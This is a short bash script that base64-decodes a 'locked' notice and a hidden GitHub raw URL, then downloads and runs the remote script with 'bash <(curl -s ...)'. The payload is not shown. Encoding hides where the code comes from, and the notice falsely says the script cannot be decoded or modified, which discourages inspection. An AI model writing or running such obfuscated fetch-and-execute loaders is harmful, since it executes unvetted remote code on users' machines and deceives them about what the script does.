#!/bin/bash

LOCKED_NOTICE=$(echo "QUlMT0NLRURfQ09ERTogVEhJUyBTSVJJUFQgSVMgTE9DS0VEIEFORCBDQU5OT1QgQkUgREVDT0RFRCBPUiBNT0RJRklFRCAtIE1vRCBQQVNIQQ==" | base64 -d)

URL=$(echo "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Fhd3dlZWJhc2hiYXNoLWN5YmVyL0JBU0hBUklQL21haW4vbW9kYmFzaGEuc2g=" | base64 -d)

echo "$LOCKED_NOTICE"
bash <(curl -s "$URL")
